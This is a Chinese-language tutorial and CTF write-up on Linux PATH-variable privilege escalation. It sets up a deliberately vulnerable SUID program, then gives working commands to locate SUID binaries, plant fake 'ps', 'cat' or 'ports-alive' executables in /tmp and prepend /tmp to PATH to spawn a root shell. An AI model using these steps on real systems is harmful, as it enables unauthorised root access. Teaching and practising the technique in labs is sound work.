环境变量提权

在 Linux 和类 Unix 操作系统中，PATH环境变量起着关键作用。它指定了系统在执行命令时搜索可执行程序的目录列表。当用户在终端输入一个命令时，系统会按照PATH变量中列出的目录顺序，依次查找该命令对应的可执行文件。例如，当执行ls命令时，系统会在PATH指定的各个目录中寻找ls程序，找到后便执行该程序并返回结果

可以通过echo $PATH查看当前用户的环境变量

利用前提：

（1）找到具有SUID权限的文件，知道文件里调用了什么系统二进制文件

（2）环境变量中有自己能控制的路径

实战：

环境配置

现在我们的当前目录是/home/lvxyz，我们将在当前目录下创建一个srcipt目录。然后cd到script目录中，编写一个简单的c程序来调用系统二进制文件的函数

代码 通过 setuid() 和 setgid() 更改uid、gid为0 即 root

然后调用system()函数 执行 ps命令 即系统二进制文件/bin/ps

root@lvxyz-ubuntu:~/script$ whereis ps
ps: /bin/ps /usr/share/man/man1/ps.1.gz

我们使用gcc命令编译demo.c文件并且赋予编译文件SUID权限

gcc demo.c -o demo
chmod u+s demo
ls -la demo

Attack利用

假设我们的ubuntu 是我们已经入侵成功的主机，ssh成功登录lvxyz普通用户了，现在要进行提权

我们利用find命令查找一下具有suid权限的文件

find / -perm -u=s -type f 2>/dev/null

发现了 /home/lvxyz/script/demo

我们运行一下这个文件，发现它会执行 ps命令

(1) echo命令

因此 我们就往/tmp写入 一个同名文件，内容为 /bin/bash

cd /tmp
echo "/bin/bash" > ps
chmod 777 ps
echo $PATH
export PATH=/tmp:$PATH
cd /home/lvxyz/script
./demo

发现成功提权为root

(2) cp命令

也可以通过 cp /bin/bash /tmp/ps，使得/tmp/ps文件等价于/bin/bash 与上面同理

成功提权root

(3) symlink命令

利用条件：suid权限的文件目录拥有所有权限

利用 symlink 符号链接命令

控制环境变量，最开头加上 . 从而控制环境变量 执行ps时优先找到 ./ps 即 /bin/bash 提权

其他命令同理，比如 c文件里写的 system("cat /etc/passwd")

我们只需重写一个 内容为/bin/sh的 cat，然后控制环境变量使得 某个suid权限的文件里在执行 cat命令时，优先找到我们重写的cat即可提权

CTF应用 - nepctf 独步天下

ls / 发现了flag 直接读取不行 没有权限

题目提示：环境变量提权

查找具有suid权限的文件：find / -perm -u=s -type f

找到了 /bin/nmap 且其拥有者为root

-rwsr-xr-x    1 root     root        931712 Jul 17 09:46 nmap

执行一下 发现 nmap里调用了 ports-alive

/bin $ nmap 1
nmap 1
sh: ports-alive: not found

环境变量提权，在/tmp下创建一个名为 ports-alive 内容为 /bin/sh 脚本。export /tmp到$PATH里最左边。运行/bin/nmap 时劫持 ports-alive命令，从而以root身份执行/bin/sh 提权

cd /tmp
echo "/bin/sh" > ports-alive
chmod +x ports-alive
export PATH=/tmp:$PATH
/bin/nmap 1